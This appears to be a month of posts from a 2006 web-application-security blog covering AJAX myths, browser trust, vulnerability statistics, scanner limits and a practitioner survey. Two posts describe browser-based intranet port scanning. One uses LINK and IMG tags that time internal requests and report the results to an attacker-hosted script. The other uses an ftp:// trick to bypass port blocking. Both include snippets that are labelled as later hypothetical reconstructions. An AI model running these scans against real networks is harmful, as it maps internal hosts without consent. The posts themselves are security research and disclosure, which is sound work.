Thursday, November 30, 2006

"The hype surrounding AJAX and security risks is hard to miss. Supposedly, this hot new technology responsible for compelling web-based applications like Gmail and Google Maps harbors a dark secret that opens the door to malicious hackers. Not exactly true. Even the most experienced Web application developers and security experts have a difficult time cutting through the buzzword banter to find the facts. And, the fact is most websites are insecure, but AJAX is not the culprit. Although AJAX does not make websites any less secure, it’s important to understand what does." read more...

Wednesday, November 29, 2006

Many respected experts before me, including Bruce Schneier, have explained the faults of trusting client-side software. Not trusting the client has been widely accepted for a long time. And in kind I’ve repeated the mantra “never ever ever ever trust the client (or user-supplied content)” many times when it comes to web application security. Then I found myself reading one of RSnake’s posts, and something he wrote caused me to think about client-side security in a new way. It occurred to me that maybe we’re wrong. Maybe we already do trust the client, or in our case here the web browser. And maybe we have no choice but to continue doing so.

RSnake: "I guess we have pretty much completely broken the same domain policies of yesterday. If I can scan your Intranet application from an HTML page without JavaScript or Java or any DHTML content whatsoever I think it’s time to start revisiting the entire DOM security model. That might just be my opinion but come on. What else do we have to do to prove it’s not working?"

He’s right of course. In the past 18 months it seems everything web browser related has been hacked. The same-origin policy, cookie security policy, history protection, the intranet boundary, extension models, flash security, location bar trust, and other sensitive areas have all been exposed. Web security models are completely broken and heck it’s spooky to even click on links these days. If we didn’t/don’t rely on client-side (browser) security, none of these discoveries would have mattered and none of us would have cared. But we do! Why is that?

You see, when a user logs in to a website, the first thing they must have is a reasonable assurance that the web page they're visiting is from whom it claims to be. It could easily be a phishing site. Without a visually trustable location bar, SSL/TLS lock symbol, or HTML hyperlink display, the user could be tricked into handing over their username/password to an attacker, which could in turn be used to illegally access our websites. Website security depends on the user not being *easily* tricked, but this does happen hundreds or maybe thousands of times a day.

This moves us to transport security. We don’t want sensitive data compromised by an attacker sniffing the browser-to-web-server connection. If for some reason the browser has a faulty implementation of SSL/TLS (it happens), the crypto can be cracked and any sensitive data our website collects could fall into the wrong hands. Our website may remain safe and sound, but the data isn’t, and that’s really the whole idea. Websites are relying on the browser to have a solid SSL/TLS implementation; otherwise, back to plaintext we go.

In exchange for a correct username/password combination, the user’s browser receives a cookie storing their session ID. The browser is the protector of this important key because if it’s stolen, the user account and their data likely go with it. The website is trusting that the same-origin and cookie security policies imposed by the browser will keep the session ID (cookies) safe. But anyone familiar with XSS, using some JavaScript and Flash malware, knows that is hardly the case. And besides, browser vulnerabilities routinely expose this information through exploits. No joy here.

Another example: websites rely on web browsers to safeguard history/cache/bookmarks/passwords and everything else containing sensitive information or granting access to it. And as we well know, all of these areas are again routinely exposed through browser vulnerability exploits or clever JavaScript malware hacks. Inside the browser walls is everything an attacker needs to hack our websites. Websites are highly dependent on web browsers keeping this data safe. Unfortunately they rarely do.

So maybe we are already trusting client-side (web browser) security. And with the web security models being set-up the way they are, we probably have to keep doing so for years to come.

"Web applications are now the top target for malicious attacks. Why? Firstly, 8 out of 10 websites have serious vulnerabilities making them easy targets for criminals seeking to cash in on cyber crime. Secondly, enterprises that want to reduce the risk of financial losses, brand damage, theft of intellectual property, legal liability, among others, are often unaware that these web application vulnerabilities exist, their possible business impact, and how they are best prevented. Currently, this lack of knowledge limits visibility into an enterprise’s actual security posture. In an effort to deliver actionable information, and raise awareness of actual web application threats, WhiteHat Security is introducing the Web Application Security Risk Report, published quarterly beginning in January 2007."

We're seeing more statistics and reviews released to the public. This is great news because it helps us all understand more about what’s going on, what’s working, and what’s not. The benefit of assessing hundreds of websites every month is you get to see vulnerability metrics as web applications change. The hardest part is pulling out the data that's meaningful. If anyone has ideas for stats they’d like to see, let us know. In the meantime, I’ll post some of the graphics below, enjoy!

The types of vulnerabilities we focus on (vulnerability stack) and the level of comprehensiveness (technical vulnerabilities and business logic flaws)

How bad is it out there? 8 out of 10 websites are vulnerable, but how severe are the issues?

The likelihood of a website having a high or medium severity vulnerability, by class.

While researching Browser Port Scanning without JavaScript, I wanted to find a way to get the browser to kill its connections and move on to the next IP address, similar to how JavaScript Port Scanning uses window.stop(), since the timeout period is quite long and I needed to speed up the process. I figured a meta refresh firing after 5 seconds was the way to go. Like so:
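The snippet itself didn't survive in this copy of the post. Based on the description, a hypothetical reconstruction would look something like this (the target IP and the attacker URL/next-page name are illustrative placeholders, not from the original):

```html
<!-- Refresh to a page probing the next IP after 5 seconds, rather than
     waiting out the browser's full connection timeout. -->
<meta http-equiv="refresh" content="5;url=http://attacker/next_ip.html">
<!-- LINK request to the target host being probed. -->
<link rel="stylesheet" type="text/css" href="http://192.168.1.100/">
```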

What I found was that while the LINK HTTP request is waiting, META refreshes won’t fire until it is resolved. Weird. Again, I don’t know how this is useful, yet, but it could be for something in the future.

I think it was RSnake who found this first, but the blocking mechanism seems to be applied only to the http protocol handler. Odd. Using the ftp protocol handler, we can bypass the block like so: ftp://jeremiahgrossman.blogspot.com:22/ If the port is up, it'll connect; if not, it times out.

I believe this technique could be used to improve JavaScript Port Scanning, where we’re currently only scanning horizontally for web servers (80/443). Instead we may be able to perform vertical port scans on the remaining ports and bypass the imposed restrictions. Perhaps it's also useful for the Browser Port Scanning without JavaScript technique.
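As a hypothetical sketch of the vertical-scan idea (the function name and port list are mine, not from the post), generating the ftp:// probe links might look like:

```javascript
// Hypothetical sketch: build ftp:// probe URLs for a vertical port scan
// of a single host. Embedded as IMG or LINK sources in a page, each URL
// forces the browser to attempt a TCP connection to that port, sidestepping
// the block that applies only to the http protocol handler. Connect-vs-
// timeout timing then hints at whether the port answered.
function ftpProbeUrls(host, ports) {
  return ports.map(port => 'ftp://' + host + ':' + port + '/');
}

console.log(ftpProbeUrls('jeremiahgrossman.blogspot.com', [21, 22, 25]));
```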

While researching different hacks and attack/defense techniques, it’s common to uncover odd behavior in software, especially in web browsers. I’ve also found that various oddities point me in the direction of a vulnerability, or sometimes tricks that become useful as part of another hack. Anyway, here’s some strangeness in Firefox that others might find interesting.

Tuesday, November 28, 2006

Update 2: Ilia Alshanetsky has already found a way to improve upon the technique using the obscure content-type "multipart/x-mixed-replace". There's a great write-up and some PHP PoC code to go with it. Good stuff! RSnake has been covering the topic as well.

Update: A sla.ckers.org project thread has been created to exchange results. Already the first post has some interesting bits.

Since my Intranet Hacking Black Hat (Vegas 2006) presentation, I've spent a lot of time researching HTML-only browser malware, since many experts now disable JavaScript. Imagine that! Using some timing tricks, I "think" I've discovered a way to perform Intranet Port Scanning with a web browser using only HTML. Unfortunately, time constraints are preventing me from finishing the proof-of-concept code anytime soon. Instead of waiting, I decided to describe the idea so maybe others could try it out. Here's how it's supposed to work... these are the two important lines of HTML:
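The two lines didn't survive in this copy of the post. Based on the description below, a hypothetical reconstruction (the attacker hostname is a placeholder; the target IP, script name, and epoch value are taken from the post's own example):

```html
<!-- 1) LINK to the target host; Firefox blocks further parsing until
        this request resolves or times out. -->
<link rel="stylesheet" type="text/css" href="http://192.168.1.100/">
<!-- 2) IMG back to the attacker's server carrying the page-generation
        epoch; it only loads once the LINK request has finished. -->
<img src="http://attacker/check_time.pl?ip=192.168.1.100&amp;start=1164762276">
```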

The HTML is hosted on an attacker-controlled website.

The LINK tag has the unique behavior of causing the browser (Firefox) to stop parsing the rest of the web page until its HTTP request (for 192.168.1.100) has finished. The purpose of the IMG tag is as a timer and data transport mechanism back to the attacker. Once the web page is loaded, at some point in the future a request is received by check_time.pl. By comparing the current epoch to the initial “epoch_timer” value (when the web page was dynamically generated), it's possible to tell if the host is up. If the time difference is less than, say, 5 seconds, then the host is likely up; if more, then the host is probably down (the browser waited for the timeout). Simple.

Example (attacker web server logs)

/check_time.pl?ip=192.168.1.100&start=1164762276
Current epoch: 1164762279 (3 second delay) - Host is up

/check_time.pl?ip=192.168.1.100&start=1164762276
Current epoch: 1164762286 (10 second delay) - Host is down
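The server-side check is simple arithmetic. The original check_time.pl was Perl (not reproduced in the post); this is a hypothetical JavaScript sketch of the same decision logic, with the function name and threshold constant being mine:

```javascript
// Hypothetical sketch of check_time.pl's timing logic. A request arrives
// as ?ip=...&start=<epoch when the page was generated>. If the LINK
// request to the target resolved quickly, the IMG (and thus this request)
// fires soon after; a long gap means the browser sat in its connection
// timeout, i.e. the host is probably down.
const TIMEOUT_THRESHOLD = 5; // seconds; tune for the network being scanned

function classifyHost(startEpoch, currentEpoch, threshold = TIMEOUT_THRESHOLD) {
  const delay = currentEpoch - startEpoch;
  return delay < threshold ? 'up' : 'down';
}

// The two log entries from the post:
console.log(classifyHost(1164762276, 1164762279)); // 3 second delay  -> up
console.log(classifyHost(1164762276, 1164762286)); // 10 second delay -> down
```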

A few browser/network nuances have caused stability and accuracy headaches, plus the technique is somewhat slow to scan with. To fork the connections I used multiple IFRAMEs, which seemed to work.

I'm pretty sure most of the issues can be worked around, but like I said, I lack the time. If anyone out there takes this up as a cause, let me know, I have some Perl scraps if you want them.

Monday, November 27, 2006

The vast majority of infosec magazines I read are awful; (IN)SECURE Magazine is not one of them. I've been reading it since the first issue and most of the article content is quality. Good job to the contributing writers and editors over there. I haven't read issue #9 yet, but I plan to this week.

Wednesday, November 22, 2006

I’m frequently asked about “completeness” when it comes to vulnerability scanning/assessments. “How do you know if all the vulnerabilities have been found?” The short answer is you don’t. Then I proceed to describe the reasons. What got me thinking was why this question is asked so often. I think the answer is only obvious to those experienced in web application security. These are faulty assumptions routinely carried over from the network vulnerability scanning world that do not apply to webappsec.

In network scanning the list of “well-known” vulnerabilities is large, but also finite. Databases such as OSVDB, SecurityFocus, MITRE (CVE), and others catalog the known universe of issues. Vulnerability coverage by network scanners is likely close to 100%. In “custom” web applications, the luxury of well-known vulnerabilities and database repositories vanishes. Each new vulnerability identified is more or less a one-off / zero-day issue. Just as with bugs in application code, we truly never know how many vulnerabilities exist in a web bank, e-commerce store, payroll system, or any other custom web application. The upper bound is unknown. Therefore we can never know for sure if any scan/assessment found them all. Vulnerability coverage could be as low as 10-20% or as high as 80-90% or more. The point is we don’t know, it's difficult to measure, and it changes with each website.

This is a big reason why I’ve been talking a lot about measuring security recently. I’m a big believer in it. Who isn’t? I even took a shot at a Methodology for Comparing Web Application Vulnerability Assessment Solutions. I figured we could use time-it-takes-to-hack-a-website as something we could reliably measure. For some reason I haven't gotten much feedback on the idea. Likely because there hasn’t been customer demand, as customers aren't REALLY aware of the fact that everything isn’t being found. Whether my methodology works or not, we’re going to need to figure this out. Once a customer of ANY webappsec VA solution gets hacked due to missed vulnerabilities, there’s going to be hell to pay.

Monday, November 20, 2006

Defense-in-depth, a concept most agree with, is where multiple layers of security protect the crown jewels. The idea is that should any layer fail, which inevitably happens, you’re still protected. Nice. In network security there are firewalls, vulnerability assessment, IDS/IPS, patch and config management, training, encryption, anti-virus, etc., each mitigating some risk. As good as they are, we know these traditional solutions aren't perfect and don’t help much in webappsec. We need to develop a new set of layers. The problem is we haven’t figured out or agreed upon which layers the modern webappsec infrastructure is supposed to have.

It’s really important that we do or at least start the dialog about what’s working and what’s not.

Here’s what we know. Security inside the SDLC eliminates flawed code, but not all of it. Vulnerability assessments identify vulnerabilities, and miss some. WAFs and IDSs spot and block attacks; some will pass through. We can train ourselves to be experts in some things, but not everything. Patching and configuration protect from the known, not the unknown. Encryption protects data from prying eyes, but not all the time. Sure, these solutions are not perfect; nothing is. That’s the point of implementing defense-in-depth. Maximize the strength of the available solutions and mitigate their weaknesses to protect the organizational assets.

Let me put this question out there… if you could implement 3 action items to protect a website, above and beyond the normal network security stuff, what would they be?

A couple days ago I mentioned that I expected to see more people writing about their experiences with web application vulnerability assessment solutions. Today Anurag Agarwal released a nice comparison of AppScan vs. WebInspect. Good stuff. Anurag also has several other good posts and articles worth taking the time to click through.

Several people asked me off-line what application I used to create those pretty 3D graphs from earlier posts. The answer is Keynote, OS X's equivalent to PowerPoint, since I'm a MacBook user. The graphs are easy to make and look really cool. The only thing I haven't been able to figure out is how to make curved line graphs. There probably is a way....

Sunday, November 19, 2006

During online account registration we all come across those obnoxious End User License Agreements (EULAs) asking us to “agree” to who knows what. Personally I like editing them ...to, well... something else. Or just deleting them. (I’m not going to get into the legalities of modifying EULAs. IANAL.) The problem is clickable EULAs are often locked inside read-only HTML textareas where the web browser won’t allow them to be edited. To get around this minor annoyance I created this handy little Edit EULA bookmarklet. Drag it to your bookmarks toolbar, and when you see a read-only textarea, click the bookmarklet and edit away! Enjoy!
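The bookmarklet's actual source isn't reproduced in this post, so here is a hypothetical reconstruction of its core logic (the function name is mine):

```javascript
// Hypothetical sketch of the Edit EULA bookmarklet's logic: walk every
// <textarea> on the page and clear its readOnly flag so the EULA text
// becomes editable.
function unlockTextareas(doc) {
  const areas = doc.getElementsByTagName('textarea');
  let unlocked = 0;
  for (let i = 0; i < areas.length; i++) {
    if (areas[i].readOnly) {
      areas[i].readOnly = false;
      unlocked++;
    }
  }
  return unlocked; // how many read-only textareas were made editable
}
```

As a bookmarklet, the same logic would be wrapped into a single `javascript:(function(){...})();` URL stored as a bookmark, so clicking it runs against the current page's document.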

Friday, November 17, 2006

What vulnerabilities (blackbox / whitebox) scanners can and can't find is one of the most important topics in web application security. Innovation in this area will inevitably determine the industry-accepted vulnerability assessment methodology. Online business depends on this problem being addressed with the right blend of coverage, ease-of-use, and price. For us vendors it’s a battleground over which solutions will ultimately be successful in the market. Competitors who do not adapt and push the technology limits will not be around long. I’ve seen this coming for a while. To the delight of many and the frustration of some, I’ve offered presentations, released articles, and written blog posts.

Since founding WhiteHat Security I’ve long believed that there was no way a scanner, built by me or someone else, could identify anywhere close to all the vulnerabilities in all websites. For years I had no good way to explain or justify my position. It wasn’t until I read a fascinating Dr. Dobb's article (The Halting Problem) from 2003 that I established the basis of my current understanding. To quote:

"None other than Alan Turing proved that a Turing Machine (and, thus, all the computers we're interested in these days) cannot decide whether a given program will halt or run continuously. By extension, no program can detect all errors or run-time faults in another program."

Brilliant! This article instantly sparked my interest in the halting problem, undecidable problems, and a bunch of other mathematical proofs. Taking what I had learned, I later introduced the “technical vulnerabilities” and “business logic flaws” terminology during a 2004 Black Hat conference. I guess people enjoyed the terminology because I frequently see others using it. Loosely described, technical vulnerabilities are those that can be found by scanners, and business logic flaws must be found by humans (experts).

What needs to be understood is that finding each vulnerability class is not exclusive to a single method of identification. Scanners and humans can in fact identify both technical and logical vulnerabilities. How effective they are is the real question. Observe the following diagram. (Don’t take the numbers too literally; the diagram is meant to reinforce concepts more than precise measurements.)

Scanners are far more adept at finding the majority of technical vulnerabilities, mostly because the vast number of tests required to be exhaustive is too time-consuming for a human (expert).

Humans (experts) are much better suited to finding business logic flaws. The issues are highly complex and require contextual understanding, which scanners (computers) lack.

Neither scanner nor human will likely or provably reach 100% vulnerability coverage. Software has bugs (vulnerabilities), and that will probably remain the case for a long time to come.

The coverage scales will slide in different directions with each website encountered. A while back I posted some stats on how vulnerabilities are identified here at WhiteHat. Based on 100 websites, here are the findings.

These numbers are interesting on a variety of levels. As more people dive into web application security, inevitably we’ll see more measurements, reviews, and statistics released. The cloud of the unknown will lift and the most effective assessment methodology will reveal itself. I welcome this trend, as I think I'm on the right track. Brass tacks...

From what I've seen, malicious web attacks typically target websites on a one-by-one basis rather than a shotgun-blast approach. The bad guys aren’t using commercial scanners, performing full-blown assessments, or even using open source tools for that matter. Frankly, because they don’t need to. A web browser and a single vulnerability are all they really need to profit. That’s why I’ve been harping on comprehensiveness and measuring the effectiveness of assessment methodologies for so long. Finding some of the vulnerabilities, some of the time, on some of the websites - ain’t going to cut it. You will get hacked this way. We need to find them all, all of the time, and as fast as possible.

My crystal ball (1-3 years):

1) Standalone black box scanners will transfer from the hands of security personnel to those in development and QA - they’ll merge with the white box scanners and finally tightly integrate inside of established IDEs.

2) The one-off vulnerability assessment market (professional services) will give way to the managed service model, just as it already has in the network VA world.

3) Major industry consolidation will occur as customers look for singular security vendors that can address the entirety of their vulnerability stack.

Tuesday, November 14, 2006

Update: Thanks again to all those who responded to the survey. 48 respondents, doubling my first attempt of 21, and a good representative split between security vendors and enterprise professionals. The results are below. I may make this survey a monthly activity provided the response is good and people find the data helpful.

My Observations

- I was a bit amazed by the significant portion of web application VAs combining the black box and white box testing methods. I knew black box would be the most common approach, but I would have figured the pure source code reviews and the combo approach would have been statistically swapped. I may need to dig in more here and ask what benefits people are seeing as a result.

- 73% of those performing web application vulnerability assessments are not using, or rarely using, commercial scanner products. It’s hard to say if this is good/bad/increasing/decreasing or otherwise. Certainly people want tools. People love their open source tools, as a vast majority are using them. Be mindful that open source webappsec tools are mostly productivity tools, not scanners like we asked about in #3, so they’re not opting for one over the other. There is a lot of room to dig in here with future questions as to why people use or don’t use certain types of products.

- People see XSS as slightly more dangerous and widespread than SQL Injection. But what’s clear is they find both issues important and weigh them heavily over the rest. Also surprising: prior to the survey, I would have thought few assessors would be checking for CSRF issues. The fact is most of them are testing for CSRF at least some portion of the time. And imagine, this issue is not on any vulnerability list. This will change soon.

- 3/4 of assessors agree more than 50% of websites have serious vulnerabilities. They also believe it would take them less than a day to find a serious issue in most of them. And 65% of assessors already knew of a previously undisclosed incident (web hack) that led to fraud, identity theft, extortion, theft of intellectual property, etc. That’s a sobering trifecta for the state of web application security.

- When asked what activity most improved security, modern software development frameworks, secure software and/or awareness training, and a stronger security presence in the SDLC were evenly split across the range, with the exception of industry regulation, which assessors felt was not a driver of security. Interesting.

Description

Several weeks ago I sent out an informal email survey to several dozen people who work in web application security professional services, consisting of a handful of multiple choice questions designed to help us understand more about the industry. The results were interesting enough to try again, this time with a few more questions and distributed to a wider audience.

If you perform web application vulnerability assessments, whether personally or professionally, then this survey is for you. I know most of us dislike taking surveys, but the more people who respond the more informative and representative the data will be.

The survey should take about 15 minutes to complete. All responses must be sent in by Nov 14.

Guidelines

Should be filled out by those who perform web application vulnerability assessments

Copy-paste the questions below into an email and send your answers to me (jeremiah __at__ whitehatsec.com)

9) How long would it take you to find a single serious web application vulnerability in MOST public websites?
a) Few minutes
b) Hour or two
c) Day and a night
d) A few days
e) Don't know, never tried

A: 23% B: 35% C: 19% D: 2% E: 21%

10) How long after a web application vulnerability assessment are most of the severe issues resolved?
a) Within hours
b) The next couple days
c) During the next scheduled software update
d) Months from discovery
e) Just before the next annual assessment

A: 0% B: 40% C: 30% D: 26% E: 4%

11) What organizational activity MOST improved the security of their websites?
a) Using modern software development frameworks (.NET, J2EE, Ruby on Rails, etc.)
b) Secure software and/or awareness training
c) A stronger security presence in the SDLC
d) Compliance to industry regulations
e) Other (please specify)

A: 21% B: 28% C: 21% D: 2% E: 28%

12) Are you privy to any undisclosed (not made public) malicious attacks made against a web application? (fraud, identity theft, extortion, theft of intellectual property, etc.)
a) No
b) One
c) A few
d) Too many to count

"There are many challenges that web application security scanners face that are widely known within the industry, however they may not be so obvious to someone evaluating a product. For starters, if you think you can just download, install, and run a product against any site and get a report outlining all of its risks, you'd probably be wrong."

Update: Kelly Jackson Higgins posted a follow-up, Group Tags More 'Hacker Safe' Sites, which by my reading was basically ScanAlert claiming XSS is more of a web browser vulnerability than one in the web server/application.

And sites flagged as XSS-vulnerable don't lose their Hacker Safe seal, he says. "The Hacker Safe seal is certification on the server-side infrastructure," Pierini says. "There are no vulnerabilities if you place an order on that site, and no vulnerabilities where someone has access to data on that server. You can't access data on that server with XSS."

I'm not going to detail all the flaws here; most people reading this are probably well familiar anyway. Let's move on.

'Hacker Safe:' Safe for Hacker. BRUTAL. It can't be a happy place today at the ScanAlert camp. They are probably fielding a lot of angry calls from customers asking why they ended up on the wall-of-shame at sla.ckers.org, and then perhaps a slew of calls from customers not on the list asking if ScanAlert is missing vulns in their websites. Then again, who knows, maybe the merchants won't even notice. Check out these quotes from the article:

"The hackers at sla.ckers.org are at it again, and this time they have found cross-site scripting (XSS) vulnerabilities on a dozen or so Websites emblazoned with ScanAlert's "Hacker Safe" seal."

Daniel Patterson, lead Webmaster for Shoppers Choice, says his company has since corrected the XSS vulnerability on its site and will be looking for other potential bugs. "It was surprising -- we thought we had fixed the problem a while back," Patterson says. "It is also surprising that Hacker Safe apparently had not notified us of a seemingly popular method for XSS."

It's really good that Shoppers Choice was able to fix the issue based on the information obtained from sla.ckers.org. How bout that! Score for full-disclosure and business responsiveness. The bug hunters chime in...

RSnake, founder of ha.ckers.org and sla.ckers.org, says his own research has uncovered some vulnerability issues that ScanAlert missed. "I don't think Hacker Safe sites are any safer than non-Hacker Safe sites, despite their claim," he says.

So what does this mean for the Hacker Safe seal? "It seems either the Hacker Safe scans are ineffective, or they don't see it as a threat," kyran says. "I expect that if I keep searching for those sites, I will find XSS in them."

Brazilian Jiu Jitsu (BJJ) was made famous in the US by UFC champion Royce Gracie. BJJ is a grappling fighting style (ground fighting) focusing on chokes, arm/leg locks, and other moves to force your opponent to submit. BJJ is one of the more physically and mentally demanding activities I've ever done. That includes Australian Rules Football! Definitely not something for the meek or faint of heart. During the last year of training I’ve lost a lot of weight, hugely increased my stamina, and become much stronger and faster. I also competed recently in my first tournament. I'm not sure where I'll take this, but so far I’m really enjoying it.

So what does having a blue belt mean? The belt levels are white -> blue -> purple -> brown -> black. It typically takes 8 - 10 years of training to reach black. So in information security terms this means I'm no longer a script-kiddy n00b type that can only run Nikto and Nessus. I can use Paros and my Firefox to find some of my own vulns in WebGoat or something. :)

Enterprise security professionals have the responsibility of dealing with vulnerabilities. They have to find and fix as many issues as possible, wherever they happen to pop up. Varying from one environment to the next, this can be a REALLY big job. To keep up, many enlist the help of commercial and open source solutions. The problem is there are perhaps hundreds, or more, vulnerability management/assessment/scan/remediation/consulting vendors, all targeting a specific niche of the vulnerability stack in their own special way. It’s a confusing landscape to say the least.

In my position I get asked a lot about who covers what, how one solution is different from the other guy's, or how good it is. I do my best to keep track of these things, since it’s my business to know and I want to give educated answers. I thought it would be helpful to create a couple of graphics that people researching solutions would be able to use. Less confusion = good.

The second graphic is a vulnerability scanning/assessment vendor comparison chart. Here we’re trying to answer the “who covers what?” question and provide a foundation for asking how they are different. I know some vendors will claim they do more than what the chart indicates, but I’m listing only their main areas of focus. If someone happens to add a web application vuln check or two, it doesn’t make them a network scanner. Likewise, if a web application scanner adds a few network checks, it's hardly a new Nessus. A decent amount of comprehensiveness in the block is required. Enjoy!

Monday, November 06, 2006

Spent the last 10 days on Maui (where I grew up) for a family vacation. We had a fantastic time; the weather was a bit rainy though still great. We set out to do a lot of different stuff from the last time. We went to the beach several times, buried Llana and Zack up to their necks in sand, built sand castles, went to a high school track meet (my 13 yr. old niece won the girls MIL varsity), trained Brazilian Jiu-Jitsu, jumped off a few waterfalls, went trick-or-treating with the kids, harvested banana stalks, chopped down a coconut tree, ate a lot of mom's Mexican food and Cupie's breaded teriyaki, planted ti leaves, jumped on the trampoline, played Monopoly and Scrabble, and Llana attended her 10 yr. reunion. The only negative was Alamo Rent A Car; I'll not be using them again. A few snaps below, and back to work for me!

Wednesday, November 01, 2006

101,435,253 to be somewhat exact. The good folks at Netcraft posted their November 2006 Web Server Survey, which added another 3.5 million from the month before. Check this out for comparison: "The first Netcraft survey in August 1995 found 18,957 hosts". Talk about explosive growth.

Previous milestones in the survey were reached in April 1997 (1 million sites), February 2000 (10 million), September 2000 (20 million), July 2001 (30 million), April 2003 (40 million), May 2004 (50 million), March 2005 (60 million), August 2005 (70 million), April 2006 (80 million), and August 2006 (90 million).

Then consider: if you counted up the sla.ckers.org board and other places listing vulnerable websites, disclosure might reach 1,000. I also guessed in Dark Reading's "The Web App Security Gap" that maybe 10,000 websites might be professionally tested for vulnerabilities by a third party. Could be lower or higher, but I don't think I'm that far off. Anyway, that's about 1/100th of a percent of the total number of sites out there. That doesn't even qualify as a drop in the bucket. The reality is we really have no idea how secure or insecure the Web is.